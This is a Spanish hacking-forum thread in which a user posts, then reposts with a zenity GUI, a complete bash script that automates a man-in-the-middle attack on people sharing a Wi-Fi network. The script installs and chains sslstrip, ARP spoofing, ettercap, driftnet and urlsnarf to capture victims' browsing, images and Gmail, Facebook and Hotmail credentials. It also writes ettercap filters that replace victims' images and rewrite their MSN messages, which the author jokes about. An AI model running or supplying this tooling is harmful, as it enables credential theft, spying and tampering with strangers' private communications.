Autor
|
Tema: Script automatizado para ataque MITM (Leído 6,136 veces)
|
aqqle
Desconectado
Mensajes: 16
|
Muy buenas señores, Les traigo un script que he realizado y he creído conveniente publicar, ya que es una pena dejarlo en el bahúl de las herramientas... Es para realizar un ataque MITM, supongo que ya sabrán de qué va la historia... ¿Qué nos permite hacer este script? Ver las direcciones que está viendo otro usuario de la wifi, ver su usuario y password de gmail, facebook, messenger, hotmail, etc etc (aún y usar el https ), ver las imágenes que está viendo (y cambiarlas jajajaja ) tmb cambiar conversaciones del msn (la víctima pone "hola" y lo cambiamos a "Perra" ) en fin aya cada uno... Eso si, está realizado para ubuntu.. y supongo que alguna otra plataforma linux, yo personalmente uso bugtraq y funciona de maravilla. Aquí el code.. #!/bin/sh quit="no" configuracion_todo () { clear echo "------------------------------------------------" echo "Creando los filtros para ettercap..." echo "------------------------------------------------" sleep 1 echo "if (ip.proto == TCP && tcp.dst == 1863) {" > mitmsg.filter echo "if (search(DATA.data, \"MSG\")) {" >> mitmsg.filter echo "replace(\"beso\", \"kaka\");" >> mitmsg.filter echo "msg(\"Modificando paquete ;)\\n\");" >> mitmsg.filter echo " }" >> mitmsg.filter echo "}" >> mitmsg.filter echo "if (ip.proto == TCP && tcp.dst == 80) {" > mitm.filter echo "if (search(DATA.data, \"Accept-Encoding\")) {" >> mitm.filter echo "replace(\"Accept-Encoding\", \"Accept-Rubbish!\");" >> mitm.filter echo "# note: replacement string is same length as original string" >> mitm.filter echo "msg(\"zapped Accept-Encoding!\\n\");" >> mitm.filter echo " }" >> mitm.filter echo "}" >> mitm.filter echo "if (ip.proto == TCP && tcp.src == 80) {" >> mitm.filter echo "replace(\"img src=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter echo "replace(\"IMG SRC=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter echo "msg(\"Filter Ran. \\n\");" >> mitm.filter echo "}" >> mitm.filter echo "--------------------------------------------> OK" echo "" sleep 1 echo "------------------------------------------------" echo "Configurar equipo para el ataque MITM" echo "------------------------------------------------" sleep 1 echo "Verificando los paquetes necesarios..." echo "------------------------------------------------" echo "xterm" verificacion=$(aptitude show xterm | grep Estado | awk '{print $2}') if [ "$verificacion" = "instalado" ]; then echo "xterm ya está instalado" else echo "xterm no está instalado, INSTALANDO..." sleep 1 sudo apt-get install xterm & fi echo "--------------------------------------------> OK" sleep 1 echo "sslstrip" verificacion=$(aptitude show sslstrip | grep Estado | awk '{print $2}') if [ "$verificacion" = "instalado" ]; then echo "sslstrip ya está instalado" else echo "sslstrip no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get install sslstrip & fi echo "--------------------------------------------> OK" sleep 1 echo "ettercap" verificacion=$(dpkg --get-selections | grep -w ettercap-common | grep -w install | awk '{print $2}') if [ "$verificacion" = "install" ]; then echo "ettercap ya está instalado" else echo "ettercap no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get install ettercap & fi echo "--------------------------------------------> OK" sleep 1 echo "dsniff" verificacion=$(aptitude show dsniff | grep Estado | awk '{print $2}') if [ "$verificacion" = "instalado" ]; then echo "dsniff ya está instalado" else echo "dsniff no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get install dsniff & fi echo "--------------------------------------------> OK" sleep 1 echo "driftnet" verificacion=$(aptitude show driftnet | grep Estado | awk '{print $2}') if [ "$verificacion" = "instalado" ]; then echo "driftnet ya está instalado" else echo "driftnet no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get install driftnet & fi echo "--------------------------------------------> OK" sleep 1 echo "" echo "" echo "Verificación de paquetes finalizada" sleep 2 echo "" echo "Configurando etter.conf" xterm -e sudo sed -ie 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & xterm -e sudo sed -ie 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & echo "--------------------------------------------> OK" sleep 1 echo "Activando ip_forward" xterm -e echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward echo "--------------------------------------------> OK" sleep 1 echo "Configurando iptables" xterm -e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 & echo "--------------------------------------------> OK" sleep 2 echo "Indica tu interface de red:" echo "Ej: wlan0, eth1 ..." echo "------------------------------------------------" read interface sleep 1 echo "" echo "--------------------------------------------> OK" sleep 1
} busc_victima () { clear echo "------------------------------------------------" echo "Buscar víctima..." echo "------------------------------------------------" sleep 1 echo "" echo "Mostrando tu dirección ip:" sleep 1 ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20 echo "------------------------------------------------" echo "Indica el rango a escanear (ej: 192.168.0.* )" echo "------------------------------------------------" read rango sleep 2 echo "------------------------------------------------" echo "Mostrando lista de usuarios conectados a la red" echo "------------------------------------------------" sleep 3 xterm -hold -e nmap -sP $rango --system-dns & } inic_mitm () { clear echo "------------------------------------------------" echo "Iniciar ataque MITM" echo "------------------------------------------------" sleep 1 echo "" echo "Iniciando sslstrip" xterm -hold -e sslstrip -a -k -f & echo "--------------------------------------------> OK" sleep 1 echo "" echo "Iniciando arpspoof" echo "Indica la ip de la puerta de enlace:" echo "------------------------------------------------" read penlaces sleep 1 echo "------------------------------------------------" echo "Indica la ip de la víctima:" echo "------------------------------------------------" read victima sleep 1 xterm -hold -e arpspoof -i $interface -t $victima $penlaces & echo "--------------------------------------------> OK" sleep 3 echo "" echo "Iniciando ettercap" xterm -hold -e sudo ettercap -T -q -i $interface & echo "--------------------------------------------> OK" sleep 1 echo "" echo "Iniciando driftnet" sleep 10 xterm -hold -e driftnet -i $interface & echo "--------------------------------------------> OK" echo "" echo "Iniciando urlsnarf" sleep 1 xterm -hold -e urlsnarf -i $interface & echo "--------------------------------------------> OK" sleep 2 } salida_x () { clear sleep 2 echo "Desactivando ip_forward" xterm -e echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward & echo "--------------------------------------------> OK" sleep 2 echo "" echo "Eliminando posibles filtros creados" rm imagen.ef rm msg.ef echo "--------------------------------------------> OK" sleep 2 echo "" echo "Configurando etter.conf" xterm -e sudo sed -ie 's/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & xterm -e sudo sed -ie 's/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & echo "--------------------------------------------> OK" sleep 2 rm mitm.filter rm mitmsg.filter clear } camb_imagen () { clear echo "------------------------------------------------" echo "Cambiar imagenes" echo "------------------------------------------------" sleep 1 echo "" echo "Indica la dirección de la imagen falsa:" echo "Ej: http://www.arcpujol.com/construccio.jpg" echo "------------------------------------------------" read direccionfalsa xterm -e sudo sed -ie 's/imagenfalsa/'$direccionfalsa'/g' mitm.filter & sleep 1 echo "Creando el filtro..." xterm -e etterfilter mitm.filter -o imagen.ef & echo "--------------------------------------------> OK" rm mitm.filter mv mitm.filtere mitm.filter echo "Iniciando ataque..." xterm -hold -e ettercap -i $interface -T -q -F imagen.ef -M ARP /$penlaces/ // & echo "--------------------------------------------> OK" sleep 1 } camb_msn () { clear echo "------------------------------------------------" echo "Cambiar los mensajes salientes de msn" echo "------------------------------------------------" sleep 1 echo "" echo "Indica primero qué palabra quieres cambiar" echo "Ej: hola" echo "------------------------------------------------" read convfalsa cp mitmsg.filter mitmsg.filter1 xterm -e sudo sed -ie 's/beso/'$convfalsa'/g' mitmsg.filter & echo "" rm mitmsg.filtere echo "Indica la palabra que sustituirá a la anterior" echo "Ej: perra" echo "------------------------------------------------" read convfalsa1 xterm -e sudo sed -ie 's/kaka/'$convfalsa1'/g' mitmsg.filter & rm mitmsg.filtere sleep 1 echo "Creando el filtro..." xterm -e etterfilter mitmsg.filter -o msg.ef & echo "--------------------------------------------> OK" rm mitmsg.filter mv mitmsg.filter1 mitm.filter echo "Iniciando ataque..." xterm -hold -e ettercap -i $interface -T -q -F msg.ef -M ARP /$penlaces/ // & echo "--------------------------------------------> OK" sleep 1 }
while [ $quit != "yes" ] do clear echo "------------------------------------------------" echo " AQQLE / AQQLE / AQQLE / AQQLE/" echo "AQQLE/ /AQQLE/ /AQQLE / /AQQLE/ /" echo " / AQQLE /AQQLE/ /AQQLE / AQQLE" echo "------------------------------------------------" echo "" echo "Menú de opciones MITM" echo "================================================" echo "1. Configuración necesaria para el ataque MITM" echo "------------------------------------------------" echo "2. Buscar víctima" echo "3. Iniciar ataque MITM" echo "4. Cambiar las imagenes entrantes a la víctima" echo "5. Cambiar las conversaciones de msn salientes" echo "------------------------------------------------" echo "0. Salir" echo "------------------------------------------------" echo -n "Escoje acción: " read eleccio case $eleccio in 1) configuracion_todo;; 2) busc_victima;; 3) inic_mitm;; 4) camb_imagen;; 5) camb_msn;; 0) salida_x; quit="yes";; *) echo "\"$eleccio\" Porfavor escoja un número del 0 al 5..." sleep 2 ;; esac done
Saludos!
|
|
« Última modificación: 17 Abril 2013, 21:42 pm por aqqle »
|
En línea
|
|
|
|
aqqle
Desconectado
Mensajes: 16
|
La respuesta la tienes arriba...
|
|
|
En línea
|
|
|
|
GrayMan
Desconectado
Mensajes: 4
|
Una pregunta, ultimamente a lo que mas me dedico es a esto, a hacer scripts de utilidades en linux, automatizar procesos, etc... y lo que no entiendo es porque utlizas tanto el sleep entre comando y comando. Por lo demas un buen aporte thx
|
|
|
En línea
|
|
|
|
aqqle
Desconectado
Mensajes: 16
|
Pues buena pregunta, no se pq siempre le pongo sleep supongo q por vicio .. Lo hago para que quede algo mejor supongo, da mas tiempo a leer.. Aquí el mismo con zenity: #!/bin/sh quit="no" configuracion_todo () { clear echo "------------------------------------------------" echo "Creando los filtros para ettercap..." echo "------------------------------------------------" sleep 1 echo "if (ip.proto == TCP && tcp.dst == 1863) {" > mitmsg.filter echo "if (search(DATA.data, \"MSG\")) {" >> mitmsg.filter echo "replace(\"beso\", \"kaka\");" >> mitmsg.filter echo "msg(\"Modificando paquete ;)\\n\");" >> mitmsg.filter echo " }" >> mitmsg.filter echo "}" >> mitmsg.filter echo "if (ip.proto == TCP && tcp.dst == 80) {" > mitm.filter echo "if (search(DATA.data, \"Accept-Encoding\")) {" >> mitm.filter echo "replace(\"Accept-Encoding\", \"Accept-Rubbish!\");" >> mitm.filter echo "# note: replacement string is same length as original string" >> mitm.filter echo "msg(\"zapped Accept-Encoding!\\n\");" >> mitm.filter echo " }" >> mitm.filter echo "}" >> mitm.filter echo "if (ip.proto == TCP && tcp.src == 80) {" >> mitm.filter echo "replace(\"img src=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter echo "replace(\"IMG SRC=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter echo "msg(\"Filter Ran. \\n\");" >> mitm.filter echo "}" >> mitm.filter echo "--------------------------------------------> OK" echo "" sleep 1 echo "------------------------------------------------" echo "Configurar equipo para el ataque MITM" echo "------------------------------------------------" sleep 1 echo "Verificando los paquetes necesarios..." echo "------------------------------------------------" echo "xterm" verificacion=$(aptitude show xterm | grep State | awk '{print $2}') if [ "$verificacion" = "installed" ]; then echo "xterm ya está instalado" else echo "xterm no está instalado, INSTALANDO..." sleep 1 sudo apt-get --force-yes install xterm & fi echo "--------------------------------------------> OK" sleep 1 echo "sslstrip" verificacion=$(aptitude show sslstrip | grep State | awk '{print $2}') if [ "$verificacion" = "installed" ]; then echo "sslstrip ya está instalado" else echo "sslstrip no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get --force-yes install sslstrip & fi echo "--------------------------------------------> OK" sleep 1 echo "ettercap" verificacion=$(dpkg --get-selections | grep -w ettercap-common | grep -w install | awk '{print $2}') if [ "$verificacion" = "install" ]; then echo "ettercap ya está instalado" else echo "ettercap no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get --force-yes install ettercap & fi echo "--------------------------------------------> OK" sleep 1 echo "dsniff" verificacion=$(aptitude show dsniff | grep State | awk '{print $2}') if [ "$verificacion" = "installed" ]; then echo "dsniff ya está instalado" else echo "dsniff no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get --force-yes install dsniff & fi echo "--------------------------------------------> OK" sleep 1 echo "driftnet" verificacion=$(aptitude show driftnet | grep State | awk '{print $2}') if [ "$verificacion" = "installed" ]; then echo "driftnet ya está instalado" else echo "driftnet no está instalado, INSTALANDO..." sleep 1 xterm -e sudo apt-get --force-yes install driftnet & fi echo "--------------------------------------------> OK" sleep 1 echo "" echo "" echo "Verificación de paquetes finalizada..." sleep 2 echo "" echo "Configurando etter.conf" xterm -e sudo sed -ie 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & xterm -e sudo sed -ie 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & echo "--------------------------------------------> OK" sleep 1 echo "Activando ip_forward" xterm -e echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward echo "--------------------------------------------> OK" sleep 1 echo "Configurando iptables" xterm -e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 & echo "--------------------------------------------> OK" sleep 2 echo "Indica tu interface de red:" echo "Ej: wlan0, eth1 ..." echo "" iwconfig echo "------------------------------------------------" interface=$(zenity --entry \ --title=".:MITM:." \ --text="Indica tu interface de red: (ej: wlan0, eth1, etc...)" \ ) sleep 1 echo "" echo "--------------------------------------------> OK" sleep 2 } busc_victima () { clear echo "------------------------------------------------" echo "Buscar víctima..." echo "------------------------------------------------" sleep 1 echo "" echo "Mostrando tu dirección ip:" sleep 1 tuip=$(ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20) ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20 echo "------------------------------------------------" echo "Indica el rango a escanear (ej: 192.168.0.* )" echo "------------------------------------------------" rango=$(zenity --entry \ --title="Rango a escanear por nmap .:MITM:." \ --text="Indica el rango a escanear" \ --text="Tu ip es:" \ --text="$tuip" \ ) sleep 1 echo "------------------------------------------------" echo "Mostrando lista de usuarios conectados a la red" echo "------------------------------------------------" sleep 1 xterm -T "Lista de usuarios conectados a la red .:MITM:." -n "AQQLE .:MITM:." -hold -e nmap -sP $rango --system-dns & sleep 3 } inic_mitm () { clear echo "------------------------------------------------" echo "Iniciar ataque MITM" echo "------------------------------------------------" sleep 1 echo "" echo "Iniciando sslstrip" xterm -hold -e sslstrip -a -k -f & echo "--------------------------------------------> OK" sleep 1 echo "" echo "Iniciando arpspoof" echo "Indica la ip de la puerta de enlace:" echo "------------------------------------------------" penlaces=$(zenity --entry \ --title="Iniciando arpspoof .:MITM:." \ --text="Indica la ip de la puerta de enlace:" \ --text="ej: 192.168.0.1" \ ) sleep 1 echo "------------------------------------------------" echo "Indica la ip de la víctima:" echo "------------------------------------------------" victima=$(zenity --entry \ --title="Iniciando arpspoof .:MITM:." \ --text="Indica la ip de la víctima" \ ) sleep 1 xterm -hold -e arpspoof -i $interface -t $victima $penlaces & echo "--------------------------------------------> OK" sleep 3 echo "" echo "Iniciando ettercap" xterm -hold -e sudo ettercap -T -q -i $interface & echo "--------------------------------------------> OK" sleep 1 echo "" echo "Iniciando driftnet" sleep 10 xterm -hold -e driftnet -i $interface & echo "--------------------------------------------> OK" echo "" echo "Iniciando urlsnarf" sleep 1 xterm -hold -e urlsnarf -i $interface & echo "--------------------------------------------> OK" sleep 2 } salida_x () { clear sleep 2 echo "Desactivando ip_forward" xterm -e echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward & echo "--------------------------------------------> OK" sleep 2 echo "" echo "Eliminando posibles filtros creados" echo"" nohup rm imagen.ef nohup rm msg.ef echo "" echo "--------------------------------------------> OK" sleep 2 echo "" echo "Configurando etter.conf" xterm -e sudo sed -ie 's/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & xterm -e sudo sed -ie 's/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf & echo "--------------------------------------------> OK" sleep 2 rm mitm.filter rm mitmsg.filter rm nohup.out clear } camb_imagen () { clear echo "------------------------------------------------" echo "Cambiar imagenes" echo "------------------------------------------------" sleep 1 echo "" echo "Indica la dirección de la imagen falsa:" echo "Ej: http://www.arcpujol.com/construccio.jpg" echo "------------------------------------------------" direccionfalsa=$(zenity --entry \ --title="Construyendo filtro .:MITM:." \ --text="Indica la dirección de la imagen falsa:" \ --text="Ej: http://www.pagweb/imagen.jpg" \ ) xterm -e sudo sed -ie 's/imagenfalsa/'$direccionfalsa'/g' mitm.filter & sleep 1 echo "Creando el filtro..." xterm -e etterfilter mitm.filter -o imagen.ef & echo "--------------------------------------------> OK" rm mitm.filter mv mitm.filtere mitm.filter echo "Iniciando ataque..." xterm -hold -e ettercap -i $interface -T -q -F imagen.ef -M ARP /$penlaces/ // & echo "--------------------------------------------> OK" sleep 1 } camb_msn () { clear echo "------------------------------------------------" echo "Cambiar los mensajes salientes de msn" echo "------------------------------------------------" sleep 1 echo "" echo "Indica primero qué palabra quieres cambiar" echo "Ej: hola" echo "------------------------------------------------" convfalsa=$(zenity --entry \ --title="Creando filtro ettercap .:MITM:." \ --text="Indica primero qué palabra quieres cambiar" \ ) cp mitmsg.filter mitmsg.filter1 xterm -e sudo sed -ie 's/beso/'$convfalsa'/g' mitmsg.filter & echo "" rm mitmsg.filtere echo "Indica la palabra que sustituirá a la anterior" echo "Ej: perra" echo "------------------------------------------------" convfalsa1=$(zenity --entry \ --title="Creando filtro ettercap .:MITM:." \ --text="Indica la palabra que sustituirá a la anterior" \ ) xterm -e sudo sed -ie 's/kaka/'$convfalsa1'/g' mitmsg.filter & rm mitmsg.filtere sleep 1 echo "Creando el filtro..." xterm -e etterfilter mitmsg.filter -o msg.ef & echo "--------------------------------------------> OK" rm mitmsg.filter mv mitmsg.filter1 mitm.filter echo "Iniciando ataque..." xterm -hold -e ettercap -i $interface -T -q -F msg.ef -M ARP /$penlaces/ // & echo "--------------------------------------------> OK" sleep 1 } while [ $quit != "yes" ] do clear echo "------------------------------------------------" echo " AQQLE / AQQLE / AQQLE / AQQLE/" echo "AQQLE/ /AQQLE/ /AQQLE / /AQQLE/ /" echo " / AQQLE /AQQLE/ /AQQLE / AQQLE" echo "------------------------------------------------" echo "" echo "" echo "Menú de opciones MITM" echo "================================================" echo "* Configuración necesaria para el ataque MITM" echo "------------------------------------------------" echo "* Buscar víctima" echo "* Iniciar ataque MITM" echo "* Cambiar las imagenes entrantes a la víctima" echo "* Cambiar las conversaciones de msn salientes" echo "------------------------------------------------" echo "* Salir" echo "------------------------------------------------" echo "" echo -n "Escoje acción" eleccion=$(zenity --list --column "Opciones:" "Configuración" "Buscar víctima" "Iniciar ataque MITM" "Cambiar imagenes entrantes" "Cambiar conversaciones salientes" "Salir" --text "Escoje acción:" --title="Menú .:MITM:. por aqqle" --height=255 --width=260) if [ "$eleccion" = "Configuración" ]; then configuracion_todo; elif [ "$eleccion" = "Buscar víctima" ]; then busc_victima; elif [ "$eleccion" = "Iniciar ataque MITM" ]; then inic_mitm; elif [ "$eleccion" = "Cambiar imagenes entrantes" ]; then camb_imagen; elif [ "$eleccion" = "Cambiar conversaciones salientes" ]; then camb_msn; elif [ "$eleccion" = "Salir" ]; then salida_x; quit="yes"; else exit 0 fi done
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
PixieScript v2.1, ataque automátizado Pixie Dust Attack
« 1 2 »
Wireless en Linux
|
ChimoC
|
10
|
17,506
|
3 Septiembre 2018, 09:08 am
por BgCRaCK
|
|
|
PixieScript v2.5, ataque automatizado Pixie Dust Attack
Wireless en Linux
|
El_Andaluz
|
0
|
5,497
|
26 Abril 2015, 06:09 am
por El_Andaluz
|
|
|
[Serio] Implementar ataque MITM + SSLstrip para windows con C# y winpcap
Hacking
|
Kaxperday
|
5
|
6,725
|
11 Octubre 2015, 17:57 pm
por Kaxperday
|
|
|
zizzania v0.0.1- automatizado ataque deauth.
Wireless en Linux
|
El_Andaluz
|
0
|
3,065
|
23 Noviembre 2016, 04:44 am
por El_Andaluz
|
|
|
Bloqueo de Facebook Messenger para Android con un ataque MITM
Noticias
|
r32
|
0
|
1,319
|
10 Julio 2018, 20:51 pm
por r32
|
|